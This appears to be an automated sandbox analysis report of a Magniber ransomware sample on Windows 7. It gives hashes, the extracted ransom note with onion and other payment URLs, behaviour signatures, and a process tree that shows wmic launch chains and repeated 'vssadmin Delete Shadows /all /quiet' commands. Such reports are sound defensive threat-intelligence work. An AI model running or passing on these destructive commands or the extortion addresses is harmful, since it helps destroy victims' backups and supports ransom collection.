Overview

overview

10

Static

static

magnibar_f...75.exe

windows7_x64

10

magnibar_f...75.exe

windows10_x64

10

Resubmissions

23-08-2021 16:26

210823-tx5an7s74s 10

18-08-2021 20:35

210818-2gkvb49v8e 10

22-07-2021 19:24

210722-68c2armfnx 10

Analysis

  • max time kernel
    101s
  • max time network
    148s
  • platform
    windows7_x64
  • resource
    win7v20210410
  • submitted
    18-08-2021 20:35

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    magnibar_f2ab74ce11c4462db427db65ff5755db4d5267d373172384a241017150e14675.exe

  • Size

    21KB

  • MD5

    4160c35d3c600712b528e8072de1bc58

  • SHA1

    12c822103678fed7b928f0202eb7e51714ab3b56

  • SHA256

    f2ab74ce11c4462db427db65ff5755db4d5267d373172384a241017150e14675

  • SHA512

    f722f7a5560641b0cbeb73dfb9d495cf2920858acfdcd5806f619256f2810569486be00eee4547b07298ca20c18d478f3f567809a7b2ff9cf81519e057a3a962

Score
10/10
magniberransomware

Malware Config

Extracted

Path

C:\Users\Admin\Desktop\readme.txt

Family

magniber

Ransom Note
ALL YOUR DOCUMENTS PHOTOS DATABASES AND OTHER IMPORTANT FILES HAVE BEEN ENCRYPTED! ==================================================================================================== Your files are NOT damaged! Your files are modified only. This modification is reversible. The only 1 way to decrypt your files is to receive the private key and decryption program. Any attempts to restore your files with the third party software will be fatal for your files! ==================================================================================================== To receive the private key and decryption program follow the instructions below: 1. Download "Tor Browser" from https://www.torproject.org/ and install it. 2. In the "Tor Browser" open your personal page here: http://1e4c82580c14c040c0lqcsthxnw.ndkeblzjnpqgpo5o.onion/lqcsthxnw Note! This page is available via "Tor Browser" only. ==================================================================================================== Also you can use temporary addresses on your personal page without using "Tor Browser": http://1e4c82580c14c040c0lqcsthxnw.wonride.site/lqcsthxnw http://1e4c82580c14c040c0lqcsthxnw.lognear.xyz/lqcsthxnw http://1e4c82580c14c040c0lqcsthxnw.lieedge.casa/lqcsthxnw http://1e4c82580c14c040c0lqcsthxnw.bejoin.space/lqcsthxnw Note! These are temporary addresses! They will be available for a limited amount of time!
URLs

http://1e4c82580c14c040c0lqcsthxnw.ndkeblzjnpqgpo5o.onion/lqcsthxnw

http://1e4c82580c14c040c0lqcsthxnw.wonride.site/lqcsthxnw

http://1e4c82580c14c040c0lqcsthxnw.lognear.xyz/lqcsthxnw

http://1e4c82580c14c040c0lqcsthxnw.lieedge.casa/lqcsthxnw

http://1e4c82580c14c040c0lqcsthxnw.bejoin.space/lqcsthxnw

Signatures

  • Magniber Ransomware

    Ransomware family widely seen in Asia being distributed by the Magnitude exploit kit.

    ransomwaremagniber
  • Process spawned unexpected child process 8 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Deletes shadow copies 2 TTPs

    Ransomware often targets backup files to inhibit system recovery.

    ransomware
  • Modifies extensions of user files 3 IoCs

    Ransomware generally changes the extension on encrypted files.

    ransomware
  • Suspicious use of SetThreadContext 3 IoCs
  • Interacts with shadow copies 2 TTPs 4 IoCs

    Shadow copies are often targeted by ransomware to inhibit system recovery.

    ransomware
  • Modifies Internet Explorer settings 1 TTPs 36 IoCs
    adwarespyware
  • Modifies registry class 11 IoCs
  • Opens file in notepad (likely ransom note) 1 IoCs
    ransomware
  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious behavior: MapViewOfSection 3 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 6 IoCs
  • Suspicious use of SendNotifyMessage 8 IoCs
  • Suspicious use of SetWindowsHookEx 6 IoCs
  • Suspicious use of WriteProcessMemory 61 IoCs

Processes

  • C:\Windows\system32\taskhost.exe
    "taskhost.exe"
    1⤵
    • Modifies extensions of user files
    • Modifies registry class
    • Suspicious use of WriteProcessMemory
    PID:1132
    • C:\Windows\system32\notepad.exe
      notepad.exe C:\Users\Public\readme.txt
      2⤵
      • Opens file in notepad (likely ransom note)
      PID:1704
    • C:\Windows\system32\cmd.exe
      cmd /c "start http://1e4c82580c14c040c0lqcsthxnw.wonride.site/lqcsthxnw^&1^&40439685^&61^&307^&12"
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:1164
      • C:\Program Files\Internet Explorer\iexplore.exe
        "C:\Program Files\Internet Explorer\iexplore.exe" http://1e4c82580c14c040c0lqcsthxnw.wonride.site/lqcsthxnw&1&40439685&61&307&12
        3⤵
        • Modifies Internet Explorer settings
        • Suspicious use of FindShellTrayWindow
        • Suspicious use of SetWindowsHookEx
        • Suspicious use of WriteProcessMemory
        PID:1940
        • C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
          "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:1940 CREDAT:275457 /prefetch:2
          4⤵
          • Modifies Internet Explorer settings
          • Suspicious use of SetWindowsHookEx
          PID:1564
    • C:\Windows\system32\cmd.exe
      cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c CompMgmtLauncher.exe""
      2⤵
        PID:568
        • C:\Windows\system32\wbem\WMIC.exe
          C:\Windows\system32\wbem\wmic process call create "cmd /c CompMgmtLauncher.exe"
          3⤵
            PID:1912
      • C:\Windows\system32\Dwm.exe
        "C:\Windows\system32\Dwm.exe"
        1⤵
        • Modifies registry class
        • Suspicious use of WriteProcessMemory
        PID:1240
        • C:\Windows\system32\cmd.exe
          cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c CompMgmtLauncher.exe""
          2⤵
          • Suspicious use of WriteProcessMemory
          PID:616
          • C:\Windows\system32\wbem\WMIC.exe
            C:\Windows\system32\wbem\wmic process call create "cmd /c CompMgmtLauncher.exe"
            3⤵
            • Suspicious use of AdjustPrivilegeToken
            PID:668
      • C:\Windows\Explorer.EXE
        C:\Windows\Explorer.EXE
        1⤵
        • Modifies registry class
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of FindShellTrayWindow
        • Suspicious use of SendNotifyMessage
        • Suspicious use of WriteProcessMemory
        PID:1288
        • C:\Users\Admin\AppData\Local\Temp\magnibar_f2ab74ce11c4462db427db65ff5755db4d5267d373172384a241017150e14675.exe
          "C:\Users\Admin\AppData\Local\Temp\magnibar_f2ab74ce11c4462db427db65ff5755db4d5267d373172384a241017150e14675.exe"
          2⤵
          • Suspicious use of SetThreadContext
          • Modifies registry class
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious behavior: MapViewOfSection
          • Suspicious use of WriteProcessMemory
          PID:2028
          • C:\Windows\system32\cmd.exe
            cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c CompMgmtLauncher.exe""
            3⤵
              PID:956
              • C:\Windows\system32\wbem\WMIC.exe
                C:\Windows\system32\wbem\wmic process call create "cmd /c CompMgmtLauncher.exe"
                4⤵
                  PID:748
            • C:\Windows\system32\cmd.exe
              cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c CompMgmtLauncher.exe""
              2⤵
              • Suspicious use of WriteProcessMemory
              PID:2012
              • C:\Windows\system32\wbem\WMIC.exe
                C:\Windows\system32\wbem\wmic process call create "cmd /c CompMgmtLauncher.exe"
                3⤵
                • Suspicious use of AdjustPrivilegeToken
                PID:536
          • C:\Windows\system32\cmd.exe
            cmd /c CompMgmtLauncher.exe
            1⤵
            • Process spawned unexpected child process
            • Suspicious use of WriteProcessMemory
            PID:1480
            • C:\Windows\system32\CompMgmtLauncher.exe
              CompMgmtLauncher.exe
              2⤵
                PID:2008
                • C:\Windows\system32\wbem\wmic.exe
                  "C:\Windows\system32\wbem\wmic.exe" process call create "vssadmin.exe Delete Shadows /all /quiet"
                  3⤵
                    PID:1632
              • C:\Windows\system32\cmd.exe
                cmd /c CompMgmtLauncher.exe
                1⤵
                • Process spawned unexpected child process
                • Suspicious use of WriteProcessMemory
                PID:1252
                • C:\Windows\system32\CompMgmtLauncher.exe
                  CompMgmtLauncher.exe
                  2⤵
                  • Suspicious use of WriteProcessMemory
                  PID:896
                  • C:\Windows\system32\wbem\wmic.exe
                    "C:\Windows\system32\wbem\wmic.exe" process call create "vssadmin.exe Delete Shadows /all /quiet"
                    3⤵
                    • Suspicious use of WriteProcessMemory
                    PID:568
              • C:\Windows\system32\cmd.exe
                cmd /c CompMgmtLauncher.exe
                1⤵
                • Process spawned unexpected child process
                • Suspicious use of WriteProcessMemory
                PID:920
                • C:\Windows\system32\CompMgmtLauncher.exe
                  CompMgmtLauncher.exe
                  2⤵
                  • Suspicious use of WriteProcessMemory
                  PID:864
                  • C:\Windows\system32\wbem\wmic.exe
                    "C:\Windows\system32\wbem\wmic.exe" process call create "vssadmin.exe Delete Shadows /all /quiet"
                    3⤵
                      PID:1624
                • C:\Windows\system32\cmd.exe
                  cmd /c CompMgmtLauncher.exe
                  1⤵
                  • Process spawned unexpected child process
                  • Suspicious use of WriteProcessMemory
                  PID:1392
                  • C:\Windows\system32\CompMgmtLauncher.exe
                    CompMgmtLauncher.exe
                    2⤵
                    • Suspicious use of WriteProcessMemory
                    PID:1080
                    • C:\Windows\system32\wbem\wmic.exe
                      "C:\Windows\system32\wbem\wmic.exe" process call create "vssadmin.exe Delete Shadows /all /quiet"
                      3⤵
                        PID:748
                  • C:\Windows\system32\vssadmin.exe
                    vssadmin.exe Delete Shadows /all /quiet
                    1⤵
                    • Process spawned unexpected child process
                    • Interacts with shadow copies
                    PID:572
                  • C:\Windows\system32\vssadmin.exe
                    vssadmin.exe Delete Shadows /all /quiet
                    1⤵
                    • Process spawned unexpected child process
                    • Interacts with shadow copies
                    • Suspicious use of WriteProcessMemory
                    PID:2008
                  • C:\Windows\system32\vssadmin.exe
                    vssadmin.exe Delete Shadows /all /quiet
                    1⤵
                    • Process spawned unexpected child process
                    • Interacts with shadow copies
                    PID:1796
                  • C:\Windows\system32\vssadmin.exe
                    vssadmin.exe Delete Shadows /all /quiet
                    1⤵
                    • Process spawned unexpected child process
                    • Interacts with shadow copies
                    PID:1032
                  • C:\Windows\system32\conhost.exe
                    \??\C:\Windows\system32\conhost.exe "-66000939-353657841131837072516511139381016668511-685266239-53052034060588091"
                    1⤵
                    • Suspicious use of WriteProcessMemory
                    PID:956
                  • C:\Windows\system32\vssvc.exe
                    C:\Windows\system32\vssvc.exe
                    1⤵
                      PID:1420
                    • C:\Windows\System32\svchost.exe
                      C:\Windows\System32\svchost.exe -k swprv
                      1⤵
                      • Suspicious use of AdjustPrivilegeToken
                      PID:1912

                    Network

                    MITRE ATT&CK Enterprise v6

                    Replay Monitor

                    Loading Replay Monitor...

                    Downloads

                    • C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\V13U08N9\favicon[2].ico
                      MD5

                      8a80554c91d9fca8acb82f023de02f11

                      SHA1

                      5f36b2ea290645ee34d943220a14b54ee5ea5be5

                      SHA256

                      ca3d163bab055381827226140568f3bef7eaac187cebd76878e0b63e9e442356

                      SHA512

                      ca4b6defb8adcc010050bc8b1bb8f8092c4928b8a0fba32146abcfb256e4d91672f88ca2cdf6210e754e5b8ac5e23fb023806ccd749ac8b701f79a691f03c87a

                      Download Submit

                    • C:\Users\Admin\Desktop\ClearLimit.vsd.lqcsthxnw
                      MD5

                      809091a01d271f7210714ac759b04732

                      SHA1

                      394953a7012de04c6c7045706b3cdf8860278bb2

                      SHA256

                      8060b55528bcc794397acc083194620c0650af7c81335ace39b8ad9cbcbcab9e

                      SHA512

                      cfd462d02e367d8e0e432f56c85dc8ab160b37ec67e2ce98471b565f6353727edd95cc6dd9282fcce604d87ded254ebdbf8036f76dcdecfd5f8b6a6725388027

                      Download Submit

                    • C:\Users\Admin\Desktop\CloseSearch.wav.lqcsthxnw
                      MD5

                      95bcd65dda4a67795d7f99466118bb07

                      SHA1

                      d574b0c1659e334ca9d12fde83919d4a6ab21ee6

                      SHA256

                      7acb0605ed010b1f7f00d1859c951499505d3cfab1b7f4d12e28350d0a3a9145

                      SHA512

                      791325e308ef885c19413fea46882ef28ad5142f1815126ac3b5829ac725a22bfa05f9a4e3c36354a9a21935eb6a9a18d506b55099957659873c872d39187806

                      Download Submit

                    • C:\Users\Admin\Desktop\ConvertFromSwitch.vsdx.lqcsthxnw
                      MD5

                      45da7409212f2d3adfc155efe1e4655c

                      SHA1

                      511ec00a6aed027853a487f2b0f2c58fb7d3d7f5

                      SHA256

                      64f395a4411b5d56a0d7bebb37053dee0f6407155176a8034965ed89254eb4d2

                      SHA512

                      cddc4131793cdb891f02e31aa9be58c30df109a4314c3b6de0d9336b99c6a6d1152a92b0e3e920619f0d8d28ec57c9ebf136345fceb8d4085fe1f8143307ccd7

                      Download Submit

                    • C:\Users\Admin\Desktop\ConvertToFormat.tif.lqcsthxnw
                      MD5

                      7aac956d6f538054ea41ff2465abc24b

                      SHA1

                      6b59affd4a06f1e33907a7e89badbded90499236

                      SHA256

                      978c3fb3d393d144fc25fd4d1e6d393cfb0567d8cd96155efcfdff6cc51b1c39

                      SHA512

                      0097076121f8ba20593bd6d7503c94077cfddf7af4fca18bfc0cb80be7d4a9797641ece3ded7729bde7623cc76e402d215ceab367acf7ac96bb42f90b695fcad

                      Download Submit

                    • C:\Users\Admin\Desktop\GrantResize.tiff.lqcsthxnw
                      MD5

                      ae9f7b0140b29693caa38daa321af92b

                      SHA1

                      2c2ec36ef0e619124c118d7cb819f2e4c1fec2bb

                      SHA256

                      924d7c1d62f3a6ca5e68e75667b347d04c4b99d16fc3b9c3df910dcdecfc3459

                      SHA512

                      595bf0f177b7dbe41f9e59307bb5ffa53db16ea293c7ebf62d5586eb7c920f854629318db3bf348a5c9545c8756676c92cde2ae3677c7ce7be08423d25c8245e

                      Download Submit

                    • C:\Users\Admin\Desktop\InvokeCheckpoint.potm.lqcsthxnw
                      MD5

                      0ecfc3765069fcf87bf8f86208ee9d48

                      SHA1

                      e948f56c748415893a639cdd66db90ab5bd42fde

                      SHA256

                      5c8ca7283a7a977ffc4dcd56f5b75ef83304d29af33a11522bc29f5ebd140117

                      SHA512

                      0b632e4b2b04f2f8bb2431526ecef4371189c88a057a15ccc38f7facb411e27bd6fdfd3a4951003cda723e6e033c5d70e4889c9992ab73cbe2bca0cd99f96162

                      Download Submit

                    • C:\Users\Admin\Desktop\RequestFormat.wmv.lqcsthxnw
                      MD5

                      b5cbd9ac4e33f364b9d78dd3ce89a372

                      SHA1

                      6dc969a9270669cd36460da3539bbf123e29ff4c

                      SHA256

                      3af1029f5823884114f2c32bb07f477cbdbb31362c460653cca30f598f3fd070

                      SHA512

                      b93228c04e037c2d48c7f8daf1db7c9d7f425d6d4638bc7a1732479bb6f24412e2b4608683eda0741504c2c9f0daa13134e60d645562c43537359ec77638eeeb

                      Download Submit

                    • C:\Users\Admin\Desktop\TestWrite.rar.lqcsthxnw
                      MD5

                      dbe33125b5105c93d6ac5e3609f00b42

                      SHA1

                      aaf4a076aa4750ae3408a35f077b5da70b0bf98c

                      SHA256

                      086263da6a206ed9223a3aae2fe646d2450cd32b5b769d51f71222d3307203d6

                      SHA512

                      aa40bd73bea289229650af25fb1cda9301dd290a5f3a4ab71d5f6914a27661af6a15f84c1066cc87b7ae9ce94d85baed0f2800b14a223370597b6d0a1ba56e4b

                      Download Submit

                    • C:\Users\Admin\Desktop\UnlockMeasure.xlsb.lqcsthxnw
                      MD5

                      4ec01417813244e241d4056eebfdf92d

                      SHA1

                      19b0c54add6bfa17d0faefedc880618ca0d9f387

                      SHA256

                      105bf52c0bf9ce02e2154c40c5d098ef7b781ca485d4498399c56378dfc0492a

                      SHA512

                      502127937e32354720f683076e88f28617959daab5e4ee225cfc8d07df03e858bf71af67cdc6df8592f033e13fae3ac2585ec4d30e61202d1a3c4faa4c9ae854

                      Download Submit

                    • C:\Users\Admin\Desktop\UnregisterPublish.vstx.lqcsthxnw
                      MD5

                      20632246c7f887269bb969fcf584a2d9

                      SHA1

                      9b37a33496775cda99d8b25f99db102e73471d8c

                      SHA256

                      c0ce1e1d97b46bcf09c45f88b31945743991a1e5b3bbc1776a7d7e2ecc910e70

                      SHA512

                      8dd51e78e03953b478d44a67da3bdb39a0caa9a9304046fe1f75b4840b69d36c13b03e7966fe1f26de3a3dd1687fe12adf3033abb7faa4ab2881f611bfdf868c

                      Download Submit

                    • C:\Users\Admin\Desktop\WaitTest.crw.lqcsthxnw
                      MD5

                      2108fdd8f165e665608085cbcb26e8e0

                      SHA1

                      e125bd3ce945aa3798f1810ad889e952497ea789

                      SHA256

                      b0033258096349d35f58fa0fc657747309744f7dd79595c7500e777416f78719

                      SHA512

                      cc9d21d06a236bebf3a58391f1b3db71f1c65ac0d336fa8a3e57f778825dff873f62245eff15a5dfdd6e2ce4a3f74040aef09d47c6b3fad261789a5bcecaf2a3

                      Download Submit

                    • C:\Users\Admin\Desktop\readme.txt
                      MD5

                      ff51cecb4b45e5c3d59b43666c8e4988

                      SHA1

                      97d3ca72da3994e2247f66985488dfe3d1e9722f

                      SHA256

                      17436aa9d9c80654c42e915bae9e2de672831b0c40e8776f532fcb3582f7abd7

                      SHA512

                      80231753b1e9703378db709c434d0963c3ea4b1b6442be6ecf950aaf8b46ecf742058a4572330032502bd7e3938c03a6f592b8a775eddea4f285be6ddcc5acfe

                      Download Submit

                    • C:\Users\Public\readme.txt
                      MD5

                      ff51cecb4b45e5c3d59b43666c8e4988

                      SHA1

                      97d3ca72da3994e2247f66985488dfe3d1e9722f

                      SHA256

                      17436aa9d9c80654c42e915bae9e2de672831b0c40e8776f532fcb3582f7abd7

                      SHA512

                      80231753b1e9703378db709c434d0963c3ea4b1b6442be6ecf950aaf8b46ecf742058a4572330032502bd7e3938c03a6f592b8a775eddea4f285be6ddcc5acfe

                      Download Submit

                    • memory/536-96-0x0000000000000000-mapping.dmp

                      Download

                    • memory/568-79-0x0000000000000000-mapping.dmp

                      Download

                    • memory/568-113-0x0000000000000000-mapping.dmp

                      Download

                    • memory/616-91-0x0000000000000000-mapping.dmp

                      Download

                    • memory/668-95-0x0000000000000000-mapping.dmp

                      Download

                    • memory/748-98-0x0000000000000000-mapping.dmp

                      Download

                    • memory/748-110-0x0000000000000000-mapping.dmp

                      Download

                    • memory/864-105-0x0000000000000000-mapping.dmp

                      Download

                    • memory/896-103-0x0000000000000000-mapping.dmp

                      Download

                    • memory/956-97-0x0000000000000000-mapping.dmp

                      Download

                    • memory/1080-104-0x0000000000000000-mapping.dmp

                      Download

                    • memory/1132-72-0x0000000000210000-0x0000000000214000-memory.dmp

                      Filesize

                      16KB

                      Download

                    • memory/1164-76-0x0000000000000000-mapping.dmp

                      Download

                    • memory/1564-100-0x0000000000000000-mapping.dmp

                      Download

                    • memory/1564-102-0x0000000074FB1000-0x0000000074FB3000-memory.dmp

                      Filesize

                      8KB

                      Download

                    • memory/1564-114-0x0000000000C40000-0x0000000000C42000-memory.dmp

                      Filesize

                      8KB

                      Download

                    • memory/1624-111-0x0000000000000000-mapping.dmp

                      Download

                    • memory/1632-112-0x0000000000000000-mapping.dmp

                      Download

                    • memory/1704-74-0x000007FEFB741000-0x000007FEFB743000-memory.dmp

                      Filesize

                      8KB

                      Download

                    • memory/1704-73-0x0000000000000000-mapping.dmp

                      Download

                    • memory/1912-93-0x0000000000000000-mapping.dmp

                      Download

                    • memory/1940-92-0x0000000000000000-mapping.dmp

                      Download

                    • memory/2008-99-0x0000000000000000-mapping.dmp

                      Download

                    • memory/2012-94-0x0000000000000000-mapping.dmp

                      Download

                    • memory/2028-66-0x0000000001CC0000-0x0000000001CC1000-memory.dmp

                      Filesize

                      4KB

                      Download

                    • memory/2028-62-0x00000000000F0000-0x00000000000F1000-memory.dmp

                      Filesize

                      4KB

                      Download

                    • memory/2028-63-0x0000000000100000-0x0000000000101000-memory.dmp

                      Filesize

                      4KB

                      Download

                    • memory/2028-64-0x0000000000110000-0x0000000000111000-memory.dmp

                      Filesize

                      4KB

                      Download

                    • memory/2028-65-0x0000000001CB0000-0x0000000001CB1000-memory.dmp

                      Filesize

                      4KB

                      Download

                    • memory/2028-60-0x0000000000020000-0x0000000000025000-memory.dmp

                      Filesize

                      20KB

                      Download

                    • memory/2028-109-0x0000000001FC0000-0x0000000001FC1000-memory.dmp

                      Filesize

                      4KB

                      Download

                    • memory/2028-67-0x0000000001CD0000-0x0000000001CD1000-memory.dmp

                      Filesize

                      4KB

                      Download

                    • memory/2028-68-0x0000000001D00000-0x0000000001D01000-memory.dmp

                      Filesize

                      4KB

                      Download

                    • memory/2028-69-0x0000000001D10000-0x0000000001D11000-memory.dmp

                      Filesize

                      4KB

                      Download

                    • memory/2028-70-0x0000000001D20000-0x0000000001D21000-memory.dmp

                      Filesize

                      4KB

                      Download

                    • memory/2028-71-0x0000000001D30000-0x0000000001D31000-memory.dmp

                      Filesize

                      4KB

                      Download

                    • memory/2028-61-0x00000000000E0000-0x00000000000E1000-memory.dmp

                      Filesize

                      4KB

                      Download